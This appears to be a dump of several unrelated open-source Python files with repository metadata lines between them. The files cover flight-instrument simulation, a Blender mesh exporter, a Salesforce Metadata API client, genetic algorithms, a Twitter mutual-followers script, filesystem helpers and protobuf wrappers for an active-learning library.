airspeed(self): """Returns the airspeed in meters per second""" return self._velocities.true_airspeed @property def heading(self): """Returns the heading in degrees""" return self._position.heading class AirspeedIndicator(object): """The AirspeedIndicator class simulates the aircraft airspeed indicator""" def __init__(self, fdmexec): """Create a new AirspeedIndicator object Arguments: fdmexec: a JSBSim FGFDMExec object """ self.fdmexec = fdmexec self._atmosphere = Atmosphere(fdmexec) @property def airspeed(self): """Returns the airspeed in knots""" total_pressure = self.fdmexec.GetAuxiliary().GetTotalPressure() total_pressure = convert_jsbsim_pressure(total_pressure) return true_airspeed(total_pressure, self._atmosphere.pressure, self._atmosphere.temperature) class Altimeter(object): """The Altimeter class simulates the aircraft altimeter""" def __init__(self, fdmexec): """Create a new Altimeter object Arguments: fdmexec: A JSBSim FGFDMExec object """ self.fdmexec = fdmexec self._atmosphere = Atmosphere(fdmexec) self._pressure = 29.92130302799185 * ur.in_Hg @property def altitude(self): """Return the altitude in feet""" sea_level_pressure = self._pressure.to(ur.pascal) altitude = pressure_altitude(sea_level_pressure.magnitude, self._atmosphere.pressure, self._atmosphere.temperature) altitude = altitude * ur.meter altitude.ito(ur.foot) return altitude.magnitude @property def pressure(self): """Return the instrument's pressure setting in inHg""" return self._pressure.magnitude @pressure.setter def pressure(self, value): """Set the instrument's pressure setting Arguments: value: the pressure in inHg """ self._pressure = value * ur.in_Hg class AttitudeIndicator(object): """The AttitudeIndicator class simulates the attitude indicator instrument""" def __init__(self, fdmexec): """Create a new AttitudeIndicator object Arguments: fdmexec: a JSBSim FGFDMExec object """ self.fdmexec = fdmexec self._orientation = Orientation(fdmexec) @property def roll(self): """Return the roll angle ikn degrees""" return self._orientation.phi @property def pitch(self): """Return the pitch angle in degrees""" return self._orientation.theta class HeadingIndicator(object): """The HeadingIndicator class simulates the heading indicator instrument""" def __init__(self, fdmexec): """Create a new HeadingIndicator object Arguments: fdmexec: a JSBSim FGFDMExec object """ self.fdmexec = fdmexec self._orientation = Orientation(fdmexec) @property def heading(self): """Return the heading in degrees""" return self._orientation.psi class VerticalSpeedIndicator(object): """The VerticalSpeedIndicator simulates the aircraft's vertical speed indicator instrument""" def __init__(self, fdmexec): """Create a new VerticalSpeedIndicator object Arguments: fdmexec: a JSBSim FGFDMExec object """ self.fdmexec = fdmexec self._velocities = Velocities(fdmexec) @property def climb_rate(self): """Return the climb rate in feet per minutes""" climb_rate = self._velocities.climb_rate * ur.meters_per_second climb_rate.ito(ur.feet_per_minute) return climb_rate.magnitude class Instruments(object): """The Instruments class contains the instances of the aircraft's instruments""" def __init__(self, fdmexec): self.fdmexec = fdmexec self.gps = GPS(fdmexec) self.airspeed_indicator = AirspeedIndicator(fdmexec) self.altimeter = Altimeter(fdmexec) self.attitude_indicator = AttitudeIndicator(fdmexec) self.heading_indicator = HeadingIndicator(fdmexec) self.vertical_speed_indicator = VerticalSpeedIndicator(fdmexec)
bsd-3-clause
6,210,240,152,551,229,000
27.506912
75
0.642903
false
3.985825
false
false
false
satishgoda/programmingusingpython
sandbox/rhomStub/randd/uv_master.py
1
6009
import bpy # Get a handle to the active object object = bpy.context.active_object # If the object is in edit mode, come out of it if object.mode == 'EDIT': bpy.ops.object.mode_set(mode='OBJECT', toggle=True) # Get a handle to the active object's mesh data bmesh = object.data ######################################################################################### class ProcessBMeshForrhom(object): '''This classes takes as input a Blender Mesh and creates an IR (Intermediate Representation) to be used by rhom. Processing includes figuring out group membership of polygons, removing redundant data in Blender's uv point tables. Apart from the processing, this class provides a clean API to be used by the exporter.''' def __init__(self, mesh): self._export_mesh = {} # MasterDict export_mesh = {} # this will be used to hash the uv's when processing the polygons one by one. # Information from here is used to update polygons and uv_layers # Can be deleted once pre-processing is done export_mesh['vertices'] = { v.index: { uvlayer.name: {} for uvlayer in bmesh.uv_layers } for v in bmesh.vertices } # Unique uvs as a result of pre-processing the polygons export_mesh['uv_layers'] = { uvlayer.name: { 'uvindex': 0, 'table': []} for uvlayer in bmesh.uv_layers } # This will hold the vertices and uv indices for all the polygons # as part of the pre-processing export_mesh['polygons'] = { p.index: { 'vertices': {'no': -1, 'array': ''}, 'uvlayers': {uvlayer.name: '' for uvlayer in bmesh.uv_layers}, 'groups': [], } for p in bmesh.polygons } # This data is used by the per polygon pre-processing step to figure out export_mesh['groups'] = {'names': [group_name for group_name in sorted(bmesh.polygon_layers_int.keys())], 'table': {p.index: [] for p in bmesh.polygons} } for polygon in bmesh.polygons: for group_name in export_mesh['groups']['names']: export_mesh['groups']['table'][polygon.index].append(bool(bmesh.polygon_layers_int[group_name].data[polygon.index].value)) ####################### Start Pre-Processing ######################## def process_uv_layer(polygon, layer, export_mesh): uvtag = layer.name uvdata = layer.data uv_layer = export_mesh['uv_layers'][uvtag] uvindices = [] for vindex in polygon.vertices: # Get the uv value corresponding to this vertex uv = uvdata[uv_layer['uvindex']].uv.to_tuple() # Is this a new uv coming in if export_mesh['vertices'][vindex][uvtag].get(uv) is None: # Get the index from master uv table index = len(export_mesh['uv_layers'][uvtag]['table']) # Insert into the master uv table export_mesh['uv_layers'][uvtag]['table'].append(uv) # Log the uv in the vertices hash, so that when a shared uv comes by, we can just use this export_mesh['vertices'][vindex][uvtag][uv] = index else: # This uv is shared, so reuse the index index = export_mesh['vertices'][vindex][uvtag][uv] # Add to the polygons master uv index uvindices.append(index) # Ready to fetch the next raw uv uv_layer['uvindex'] += 1 # Store the uv index loop as a ready to use list for rhom export_mesh['polygons'][polygon.index]['uvlayers'][uvtag] = '{0}'.format(str(uvindices)) # Group membership data for each polygon def process_group_membership(polygon, export_mesh): polygon_groups = export_mesh['polygons'][polygon.index]['groups'] groups_table = export_mesh['groups']['table'] groups_names = export_mesh['groups']['names'] for (group_index, is_present) in enumerate(groups_table[polygon.index]): if is_present: polygon_groups.append(groups_names[group_index]) # PRE PROCESSING OF THE MESH for polygon in bmesh.polygons: # This data will be used for generating the Vertex Table vertices = export_mesh['polygons'][polygon.index]['vertices'] vertices['no'] = len(polygon.vertices) vertices['array'] = '{0}'.format(str(list(polygon.vertices))) for layer in bmesh.uv_layers: process_uv_layer(polygon, layer, export_mesh) process_group_membership(polygon, export_mesh) ####################### End Pre-Processing ########################### #from pprint import pprint #pprint(export_mesh) #################### Use rhom Stub to Create Obn ################## if not False: import sys sys.path.append('/muse/satishg/learning/soc/obnblender/blender/io_scene_obn') import rhomstub as rhom mesh = rhom.Mesh() for vertex in bmesh.vertices: x, y, z = vertex.co mesh.addPoint(rhom.Point(x, y, z)) for uvtag in export_mesh['uv_layers'].keys(): for uv in export_mesh['uv_layers'][uvtag]['table']: mesh.addTexCoord(uvtag, rhom.TexCoord(uv[0], uv[1])) for group_name in export_mesh['groups']['names']: mesh.addGroup(group_name) for polygon_index, polygon in export_mesh['polygons'].items(): element = mesh.addElement(polygon['vertices']['no']) mesh.setPointIndices(element, polygon['vertices']['array']) for uvtag in export_mesh['uv_layers']: mesh.setTexCoordIndices(uvtag, element, polygon['uvlayers'][uvtag]) for group_name in polygon['groups']: mesh.addElementToGroup(mesh.getElement(polygon_index), group_name) if group_name.endswith('Mtl'): mesh.setMaterial(mesh.getElement(polygon_index), 'xxx_' + group_name) rhom.writeMesh('Foo.obn', mesh)
gpl-2.0
9,153,331,899,270,852,000
39.601351
130
0.59128
false
3.942913
false
false
false
rbauction/sfdclib
sfdclib/metadata.py
1
10823
""" Class to work with Salesforce Metadata API """ from base64 import b64encode, b64decode from xml.etree import ElementTree as ET import sfdclib.messages as msg class SfdcMetadataApi: """ Class to work with Salesforce Metadata API """ _METADATA_API_BASE_URI = "/services/Soap/m/{version}" _XML_NAMESPACES = { 'soapenv': 'http://schemas.xmlsoap.org/soap/envelope/', 'mt': 'http://soap.sforce.com/2006/04/metadata' } def __init__(self, session): if not session.is_connected(): raise Exception("Session must be connected prior to instantiating this class") self._session = session self._deploy_zip = None def _get_api_url(self): return "%s%s" % ( self._session.get_server_url(), self._METADATA_API_BASE_URI.format(**{'version': self._session.get_api_version()})) def deploy(self, zipfile, options): """ Kicks off async deployment, returns deployment id """ check_only = "" if 'checkonly' in options: check_only = "<met:checkOnly>%s</met:checkOnly>" % options['checkonly'] test_level = "" if 'testlevel' in options: test_level = "<met:testLevel>%s</met:testLevel>" % options['testlevel'] tests_tag = "" if 'tests' in options: for test in options['tests']: tests_tag += "<met:runTests>%s</met:runTests>\n" % test attributes = { 'client': 'Metahelper', 'checkOnly': check_only, 'sessionId': self._session.get_session_id(), 'ZipFile': self._read_deploy_zip(zipfile), 'testLevel': test_level, 'tests': tests_tag } request = msg.DEPLOY_MSG.format(**attributes) headers = {'Content-type': 'text/xml', 'SOAPAction': 'deploy'} res = self._session.post(self._get_api_url(), headers=headers, data=request) if res.status_code != 200: raise Exception( "Request failed with %d code and error [%s]" % (res.status_code, res.text)) async_process_id = ET.fromstring(res.text).find( 'soapenv:Body/mt:deployResponse/mt:result/mt:id', self._XML_NAMESPACES).text state = ET.fromstring(res.text).find( 'soapenv:Body/mt:deployResponse/mt:result/mt:state', self._XML_NAMESPACES).text return async_process_id, state @staticmethod def _read_deploy_zip(zipfile): if hasattr(zipfile, 'read'): file = zipfile file.seek(0) should_close = False else: file = open(zipfile, 'rb') should_close = True raw = file.read() if should_close: file.close() return b64encode(raw).decode("utf-8") def _retrieve_deploy_result(self, async_process_id): """ Retrieves status for specified deployment id """ attributes = { 'client': 'Metahelper', 'sessionId': self._session.get_session_id(), 'asyncProcessId': async_process_id, 'includeDetails': 'true' } mt_request = msg.CHECK_DEPLOY_STATUS_MSG.format(**attributes) headers = {'Content-type': 'text/xml', 'SOAPAction': 'checkDeployStatus'} res = self._session.post(self._get_api_url(), headers=headers, data=mt_request) root = ET.fromstring(res.text) result = root.find( 'soapenv:Body/mt:checkDeployStatusResponse/mt:result', self._XML_NAMESPACES) if result is None: raise Exception("Result node could not be found: %s" % res.text) return result def check_deploy_status(self, async_process_id): """ Checks whether deployment succeeded """ result = self._retrieve_deploy_result(async_process_id) state = result.find('mt:status', self._XML_NAMESPACES).text state_detail = result.find('mt:stateDetail', self._XML_NAMESPACES) if state_detail is not None: state_detail = state_detail.text unit_test_errors = [] deployment_errors = [] if state == 'Failed': # Deployment failures failures = result.findall('mt:details/mt:componentFailures', self._XML_NAMESPACES) for failure in failures: deployment_errors.append({ 'type': failure.find('mt:componentType', self._XML_NAMESPACES).text, 'file': failure.find('mt:fileName', self._XML_NAMESPACES).text, 'status': failure.find('mt:problemType', self._XML_NAMESPACES).text, 'message': failure.find('mt:problem', self._XML_NAMESPACES).text }) # Unit test failures failures = result.findall( 'mt:details/mt:runTestResult/mt:failures', self._XML_NAMESPACES) for failure in failures: unit_test_errors.append({ 'class': failure.find('mt:name', self._XML_NAMESPACES).text, 'method': failure.find('mt:methodName', self._XML_NAMESPACES).text, 'message': failure.find('mt:message', self._XML_NAMESPACES).text, 'stack_trace': failure.find('mt:stackTrace', self._XML_NAMESPACES).text }) deployment_detail = { 'total_count': result.find('mt:numberComponentsTotal', self._XML_NAMESPACES).text, 'failed_count': result.find('mt:numberComponentErrors', self._XML_NAMESPACES).text, 'deployed_count': result.find('mt:numberComponentsDeployed', self._XML_NAMESPACES).text, 'errors': deployment_errors } unit_test_detail = { 'total_count': result.find('mt:numberTestsTotal', self._XML_NAMESPACES).text, 'failed_count': result.find('mt:numberTestErrors', self._XML_NAMESPACES).text, 'completed_count': result.find('mt:numberTestsCompleted', self._XML_NAMESPACES).text, 'errors': unit_test_errors } return state, state_detail, deployment_detail, unit_test_detail def download_unit_test_logs(self, async_process_id): """ Downloads Apex logs for unit tests executed during specified deployment """ result = self._retrieve_deploy_result(async_process_id) print("Results: %s" % ET.tostring(result, encoding="us-ascii", method="xml")) def retrieve(self, options): """ Submits retrieve request """ # Compose unpackaged XML unpackaged = '' for metadata_type in options['unpackaged']: members = options['unpackaged'][metadata_type] unpackaged += '<types>' for member in members: unpackaged += '<members>{0}</members>'.format(member) unpackaged += '<name>{0}</name></types>'.format(metadata_type) # Compose retrieve request XML attributes = { 'client': 'Metahelper', 'sessionId': self._session.get_session_id(), 'apiVersion': self._session.get_api_version(), 'singlePackage': options['single_package'], 'unpackaged': unpackaged } request = msg.RETRIEVE_MSG.format(**attributes) # Submit request headers = {'Content-type': 'text/xml', 'SOAPAction': 'retrieve'} res = self._session.post(self._get_api_url(), headers=headers, data=request) if res.status_code != 200: raise Exception( "Request failed with %d code and error [%s]" % (res.status_code, res.text)) # Parse results to get async Id and status async_process_id = ET.fromstring(res.text).find( 'soapenv:Body/mt:retrieveResponse/mt:result/mt:id', self._XML_NAMESPACES).text state = ET.fromstring(res.text).find( 'soapenv:Body/mt:retrieveResponse/mt:result/mt:state', self._XML_NAMESPACES).text return async_process_id, state def _retrieve_retrieve_result(self, async_process_id, include_zip): """ Retrieves status for specified retrieval id """ attributes = { 'client': 'Metahelper', 'sessionId': self._session.get_session_id(), 'asyncProcessId': async_process_id, 'includeZip': include_zip } mt_request = msg.CHECK_RETRIEVE_STATUS_MSG.format(**attributes) headers = {'Content-type': 'text/xml', 'SOAPAction': 'checkRetrieveStatus'} res = self._session.post(self._get_api_url(), headers=headers, data=mt_request) root = ET.fromstring(res.text) result = root.find( 'soapenv:Body/mt:checkRetrieveStatusResponse/mt:result', self._XML_NAMESPACES) if result is None: raise Exception("Result node could not be found: %s" % res.text) return result def retrieve_zip(self, async_process_id): """ Retrieves ZIP file """ result = self._retrieve_retrieve_result(async_process_id, 'true') state = result.find('mt:status', self._XML_NAMESPACES).text error_message = result.find('mt:errorMessage', self._XML_NAMESPACES) if error_message is not None: error_message = error_message.text # Check if there are any messages messages = [] message_list = result.findall('mt:details/mt:messages', self._XML_NAMESPACES) for message in message_list: messages.append({ 'file': message.find('mt:fileName', self._XML_NAMESPACES).text, 'message': message.find('mt:problem', self._XML_NAMESPACES).text }) # Retrieve base64 encoded ZIP file zipfile_base64 = result.find('mt:zipFile', self._XML_NAMESPACES).text zipfile = b64decode(zipfile_base64) return state, error_message, messages, zipfile def check_retrieve_status(self, async_process_id): """ Checks whether retrieval succeeded """ result = self._retrieve_retrieve_result(async_process_id, 'false') state = result.find('mt:status', self._XML_NAMESPACES).text error_message = result.find('mt:errorMessage', self._XML_NAMESPACES) if error_message is not None: error_message = error_message.text # Check if there are any messages messages = [] message_list = result.findall('mt:details/mt:messages', self._XML_NAMESPACES) for message in message_list: messages.append({ 'file': message.find('mt:fileName', self._XML_NAMESPACES).text, 'message': message.find('mt:problem', self._XML_NAMESPACES).text }) return state, error_message, messages
mit
-2,345,350,160,945,566,700
42.119522
100
0.588931
false
3.990782
true
false
false
bema-ligo/pycbc
pycbc/inference/sampler.py
1
1386
# Copyright (C) 2016 Christopher M. Biwer # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation; either version 3 of the License, or (at your # option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General # Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # ============================================================================= # # Preamble # # ============================================================================= # """ This modules provides a list of implemented samplers for parameter estimation. """ import numpy from pycbc.inference.sampler_kombine import KombineSampler from pycbc.inference.sampler_emcee import EmceeEnsembleSampler, EmceePTSampler # list of available samplers samplers = { KombineSampler.name : KombineSampler, EmceeEnsembleSampler.name : EmceeEnsembleSampler, EmceePTSampler.name : EmceePTSampler, }
gpl-3.0
3,212,687,464,336,453,600
36.459459
79
0.664502
false
4.291022
false
false
false
handcraftsman/GeneticAlgorithmsWithPython
es/ch03/genetic.py
1
3034
# File: genetic.py # Del capítulo 3 de _Algoritmos Genéticos con Python_ # # Author: Clinton Sheppard <fluentcoder@gmail.com> # Copyright (c) 2017 Clinton Sheppard # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. See the License for the specific language governing # permissions and limitations under the License. import random import statistics import sys import time def _generar_padre(longitud, geneSet, obtener_aptitud): genes = [] while len(genes) < longitud: tamañoMuestral = min(longitud - len(genes), len(geneSet)) genes.extend(random.sample(geneSet, tamañoMuestral)) aptitud = obtener_aptitud(genes) return Cromosoma(genes, aptitud) def _mutar(padre, geneSet, obtener_aptitud): genesDelNiño = padre.Genes[:] índice = random.randrange(0, len(padre.Genes)) nuevoGen, alterno = random.sample(geneSet, 2) genesDelNiño[índice] = alterno if nuevoGen == genesDelNiño[ índice] else nuevoGen aptitud = obtener_aptitud(genesDelNiño) return Cromosoma(genesDelNiño, aptitud) def obtener_mejor(obtener_aptitud, longitudObjetivo, aptitudÓptima, geneSet, mostrar): random.seed() def fnMutar(padre): return _mutar(padre, geneSet, obtener_aptitud) def fnGenerarPadre(): return _generar_padre(longitudObjetivo, geneSet, obtener_aptitud) for mejora in _obtener_mejoras(fnMutar, fnGenerarPadre): mostrar(mejora) if not aptitudÓptima > mejora.Aptitud: return mejora def _obtener_mejoras(nuevo_niño, generar_padre): mejorPadre = generar_padre() yield mejorPadre while True: niño = nuevo_niño(mejorPadre) if mejorPadre.Aptitud > niño.Aptitud: continue if not niño.Aptitud > mejorPadre.Aptitud: mejorPadre = niño continue yield niño mejorPadre = niño class Cromosoma: def __init__(self, genes, aptitud): self.Genes = genes self.Aptitud = aptitud class Comparar: @staticmethod def ejecutar(función): cronometrajes = [] stdout = sys.stdout for i in range(100): sys.stdout = None horaInicio = time.time() función() segundos = time.time() - horaInicio sys.stdout = stdout cronometrajes.append(segundos) promedio = statistics.mean(cronometrajes) if i < 10 or i % 10 == 9: print("{} {:3.2f} {:3.2f}".format( 1 + i, promedio, statistics.stdev(cronometrajes, promedio) if i > 1 else 0))
apache-2.0
243,886,378,590,808,930
30.684211
79
0.652492
false
3.013013
false
false
false
basilhskk/ergasies
ergasia8.py
1
1425
#imports import tweepy from tweepy import OAuthHandler #keys ckey='...' csecret='...' atoken='...' asecret='...' #error handling twitter let me draw only 5000 ids at a time try: auth = OAuthHandler(ckey, csecret) auth.set_access_token(atoken, asecret) api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True) #finding users id. user1=raw_input("Give the first name: ") user2=raw_input("Give me second name: ") user=api.get_user(user1) userid1=user.id user=api.get_user(user2) userid2=user.id #collecting user1 followers. fuser1 = tweepy.Cursor(api.followers_ids, id = userid1) ids1=[] for page in fuser1.pages(): ids1.extend(page) #collecting user2 followers. ids2=[] fuser2 = tweepy.Cursor(api.followers_ids, id = userid2) for page in fuser2.pages(): ids2.extend(page) except BaseException, e: print "Error",str(e) #finding the mutual followers. mids=[] for i in range(0,len(ids1)): if ids1[i] in ids2: u= api.get_user(ids1[i]) mids.append(u.screen_name) #printing final results. if len(mids)==0: print user1,"and",user2,"have no mutual followers." elif len(mids)==1: print "The mutual followers of",user1,"and",user2,"is:" ,[item.encode('utf-8') for item in mids] else: print "The mutual followers of",user1,"and",user2,"are:" ,[item.encode('utf-8') for item in mids]
gpl-3.0
-8,160,394,223,410,080,000
29.978261
101
0.669474
false
2.896341
false
false
false
jimzhan/pyx
rex/core/fs.py
1
4479
# -*- coding: utf-8 -*- """ Functions that interact with local file system. """ from __future__ import with_statement import os import shutil import logging import itertools from rex.core import regex logger = logging.getLogger(__name__) #========================================================================================== # General/Common Properties #========================================================================================== sysroot = os.path.abspath('/') userdir = os.path.expanduser('~') def realpath(path): """ Create the real absolute path for the given path. Add supports for userdir & / supports. Args: * path: pathname to use for realpath. Returns: Platform independent real absolute path. """ if path == '~': return userdir if path == '/': return sysroot if path.startswith('/'): return os.path.abspath(path) if path.startswith('~/'): return os.path.expanduser(path) if path.startswith('./'): return os.path.abspath(os.path.join(os.path.curdir, path[2:])) return os.path.abspath(path) def find(pattern, path=os.path.curdir, recursive=False): """ Find absolute file/folder paths with the given ``re`` pattern. Args: * pattern: search pattern, support both string (exact match) and `re` pattern. * path: root path to start searching, default is current working directory. * recursive: whether to recursively find the matched items from `path`, False by default Returns: Generator of the matched items of Files/Folders. """ root = realpath(path) Finder = lambda item: regex.is_regex(pattern) \ and pattern.match(item) or (pattern == item) if recursive: for base, dirs, files in os.walk(root, topdown=True): for segment in itertools.chain(filter(Finder, files), filter(Finder, dirs)): yield FS(os.path.join(base, segment)) else: for segment in filter(Finder, os.listdir(root)): yield(os.path.join(root, segment)) class FS(object): """ Generic file system object. Attributes: * path: absolute path of the file system object. """ def __init__(self, path, *args, **kwargs): self.path = realpath(path) def __unicode__(self): return self.path def __repr__(self): return self.path @property def exists(self): return os.path.exists(self.path) @property def name(self): return os.path.basename(self.path) def copy(self, dest): """ Copy item to the given `dest` path. Args: * dest: destination path to copy. """ if os.path.isfile(self.path): shutil.copy2(self.path, dest) else: shutil.copytree(self.path, dest, symlinks=False, ignore=None) def create(self): """ Create item under file system with its path. Returns: True if its path does not exist, False otherwise. """ if os.path.isfile(self.path): if not os.path.exists(self.path): with open(self.path, 'w') as fileobj: fileobj.write('') else: os.makedirs(self.path) def delete(self): """ Delete the file/folder itself from file system. """ if os.path.isfile(self.path): os.remove(self.path) else: shutil.rmtree(self.path) def move(self, dest): """ Move item to the given `dest` path. Args: * dest: destination path to move. """ shutil.move(self.path, dest) def flush(self): """ Commit the marked action, against `revert`. """ raise NotImplementedError def revert(self): """ Revert the last action. """ raise NotImplementedError class File(FS): def create(self): """ Create item under file system with its path. Returns: True if its path does not exist, False otherwise. """ if not os.path.exists(self.path): with open(self.path, 'w') as fileobj: fileobj.write('') class Folder(FS): def create(self): """ Recursively create the folder using its path. """ os.makedirs(self.path)
apache-2.0
-6,516,505,945,339,783,000
21.852041
96
0.546997
false
4.335915
false
false
false
chengsoonong/acton
acton/proto/wrappers.py
1
16442
"""Classes that wrap protobufs.""" import json from typing import Union, List, Iterable import acton.database import acton.proto.acton_pb2 as acton_pb import acton.proto.io import google.protobuf.json_format as json_format import numpy import sklearn.preprocessing from sklearn.preprocessing import LabelEncoder as SKLabelEncoder def validate_db(db: acton_pb.Database): """Validates a Database proto. Parameters ---------- db Database to validate. Raises ------ ValueError """ if db.class_name not in acton.database.DATABASES: raise ValueError('Invalid database class name: {}'.format( db.class_name)) if not db.path: raise ValueError('Must specify db.path.') def deserialise_encoder( encoder: acton_pb.Database.LabelEncoder ) -> sklearn.preprocessing.LabelEncoder: """Deserialises a LabelEncoder protobuf. Parameters ---------- encoder LabelEncoder protobuf. Returns ------- sklearn.preprocessing.LabelEncoder LabelEncoder (or None if no encodings were specified). """ encodings = [] for encoding in encoder.encoding: encodings.append((encoding.class_int, encoding.class_label)) encodings.sort() encodings = numpy.array([c[1] for c in encodings]) encoder = SKLabelEncoder() encoder.classes_ = encodings return encoder class LabelPool(object): """Wrapper for the LabelPool protobuf. Attributes ---------- proto : acton_pb.LabelPool Protobuf representing the label pool. db_kwargs : dict Key-value pairs of keyword arguments for the database constructor. label_encoder : sklearn.preprocessing.LabelEncoder Encodes labels as integers. May be None. """ def __init__(self, proto: Union[str, acton_pb.LabelPool]): """ Parameters ---------- proto Path to .proto file, or raw protobuf itself. """ try: self.proto = acton.proto.io.read_proto(proto, acton_pb.LabelPool) except TypeError: if isinstance(proto, acton_pb.LabelPool): self.proto = proto else: raise TypeError('proto should be str or LabelPool protobuf.') self._validate_proto() self.db_kwargs = {kwa.key: json.loads(kwa.value) for kwa in self.proto.db.kwarg} if len(self.proto.db.label_encoder.encoding) > 0: self.label_encoder = deserialise_encoder( self.proto.db.label_encoder) self.db_kwargs['label_encoder'] = self.label_encoder else: self.label_encoder = None self._set_default() @classmethod def deserialise(cls, proto: bytes, json: bool=False) -> 'LabelPool': """Deserialises a protobuf into a LabelPool. Parameters ---------- proto Serialised protobuf. json Whether the serialised protobuf is in JSON format. Returns ------- LabelPool """ if not json: lp = acton_pb.LabelPool() lp.ParseFromString(proto) return cls(lp) return cls(json_format.Parse(proto, acton_pb.LabelPool())) @property def DB(self) -> acton.database.Database: """Gets a database context manager for the specified database. Returns ------- type Database context manager. """ if hasattr(self, '_DB'): return self._DB self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name]( self.proto.db.path, **self.db_kwargs) return self._DB @property def ids(self) -> List[int]: """Gets a list of IDs. Returns ------- List[int] List of known IDs. """ if hasattr(self, '_ids'): return self._ids self._ids = list(self.proto.id) return self._ids @property def labels(self) -> numpy.ndarray: """Gets labels array specified in input. Notes ----- The returned array is cached by this object so future calls will not need to recompile the array. Returns ------- numpy.ndarray T x N x F NumPy array of labels. """ if hasattr(self, '_labels'): return self._labels ids = self.ids with self.DB() as db: return db.read_labels([0], ids) def _validate_proto(self): """Checks that the protobuf is valid and enforces constraints. Raises ------ ValueError """ validate_db(self.proto.db) def _set_default(self): """Adds default parameters to the protobuf.""" @classmethod def make( cls: type, ids: Iterable[int], db: acton.database.Database) -> 'LabelPool': """Constructs a LabelPool. Parameters ---------- ids Iterable of instance IDs. db Database Returns ------- LabelPool """ proto = acton_pb.LabelPool() # Store the IDs. for id_ in ids: proto.id.append(id_) # Store the database. proto.db.CopyFrom(db.to_proto()) return cls(proto) class Predictions(object): """Wrapper for the Predictions protobuf. Attributes ---------- proto : acton_pb.Predictions Protobuf representing predictions. db_kwargs : dict Dictionary of database keyword arguments. label_encoder : sklearn.preprocessing.LabelEncoder Encodes labels as integers. May be None. """ def __init__(self, proto: Union[str, acton_pb.Predictions]): """ Parameters ---------- proto Path to .proto file, or raw protobuf itself. """ try: self.proto = acton.proto.io.read_proto( proto, acton_pb.Predictions) except TypeError: if isinstance(proto, acton_pb.Predictions): self.proto = proto else: raise TypeError('proto should be str or Predictions protobuf.') self._validate_proto() self.db_kwargs = {kwa.key: json.loads(kwa.value) for kwa in self.proto.db.kwarg} if len(self.proto.db.label_encoder.encoding) > 0: self.label_encoder = deserialise_encoder( self.proto.db.label_encoder) self.db_kwargs['label_encoder'] = self.label_encoder else: self.label_encoder = None self._set_default() @property def DB(self) -> acton.database.Database: """Gets a database context manager for the specified database. Returns ------- type Database context manager. """ if hasattr(self, '_DB'): return self._DB self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name]( self.proto.db.path, **self.db_kwargs) return self._DB @property def predicted_ids(self) -> List[int]: """Gets a list of IDs corresponding to predictions. Returns ------- List[int] List of IDs corresponding to predictions. """ if hasattr(self, '_predicted_ids'): return self._predicted_ids self._predicted_ids = [prediction.id for prediction in self.proto.prediction] return self._predicted_ids @property def labelled_ids(self) -> List[int]: """Gets a list of IDs the predictor knew the label for. Returns ------- List[int] List of IDs the predictor knew the label for. """ if hasattr(self, '_labelled_ids'): return self._labelled_ids self._labelled_ids = list(self.proto.labelled_id) return self._labelled_ids @property def predictions(self) -> numpy.ndarray: """Gets predictions array specified in input. Notes ----- The returned array is cached by this object so future calls will not need to recompile the array. Returns ------- numpy.ndarray T x N x D NumPy array of predictions. """ if hasattr(self, '_predictions'): return self._predictions self._predictions = [] for prediction in self.proto.prediction: data = prediction.prediction shape = (self.proto.n_predictors, self.proto.n_prediction_dimensions) self._predictions.append( acton.proto.io.get_ndarray(data, shape, float)) self._predictions = numpy.array(self._predictions).transpose((1, 0, 2)) return self._predictions def _validate_proto(self): """Checks that the protobuf is valid and enforces constraints. Raises ------ ValueError """ if self.proto.n_predictors < 1: raise ValueError('Number of predictors must be > 0.') if self.proto.n_prediction_dimensions < 1: raise ValueError('Prediction dimension must be > 0.') validate_db(self.proto.db) def _set_default(self): """Adds default parameters to the protobuf.""" @classmethod def make( cls: type, predicted_ids: Iterable[int], labelled_ids: Iterable[int], predictions: numpy.ndarray, db: acton.database.Database, predictor: str='') -> 'Predictions': """Converts NumPy predictions to a Predictions object. Parameters ---------- predicted_ids Iterable of instance IDs corresponding to predictions. labelled_ids Iterable of instance IDs used to train the predictor. predictions T x N x D array of corresponding predictions. predictor Name of predictor used to generate predictions. db Database. Returns ------- Predictions """ proto = acton_pb.Predictions() # Store single data first. n_predictors, n_instances, n_prediction_dimensions = predictions.shape proto.n_predictors = n_predictors proto.n_prediction_dimensions = n_prediction_dimensions proto.predictor = predictor # Store the database. proto.db.CopyFrom(db.to_proto()) # Store the predictions array. We can do this by looping over the # instances. for id_, prediction in zip( predicted_ids, predictions.transpose((1, 0, 2))): prediction_ = proto.prediction.add() prediction_.id = int(id_) # numpy.int64 -> int prediction_.prediction.extend(prediction.ravel()) # Store the labelled IDs. for id_ in labelled_ids: # int() here takes numpy.int64 to int, for protobuf compatibility. proto.labelled_id.append(int(id_)) return cls(proto) @classmethod def deserialise(cls, proto: bytes, json: bool=False) -> 'Predictions': """Deserialises a protobuf into Predictions. Parameters ---------- proto Serialised protobuf. json Whether the serialised protobuf is in JSON format. Returns ------- Predictions """ if not json: predictions = acton_pb.Predictions() predictions.ParseFromString(proto) return cls(predictions) return cls(json_format.Parse(proto, acton_pb.Predictions())) class Recommendations(object): """Wrapper for the Recommendations protobuf. Attributes ---------- proto : acton_pb.Recommendations Protobuf representing recommendations. db_kwargs : dict Key-value pairs of keyword arguments for the database constructor. label_encoder : sklearn.preprocessing.LabelEncoder Encodes labels as integers. May be None. """ def __init__(self, proto: Union[str, acton_pb.Recommendations]): """ Parameters ---------- proto Path to .proto file, or raw protobuf itself. """ try: self.proto = acton.proto.io.read_proto( proto, acton_pb.Recommendations) except TypeError: if isinstance(proto, acton_pb.Recommendations): self.proto = proto else: raise TypeError( 'proto should be str or Recommendations protobuf.') self._validate_proto() self.db_kwargs = 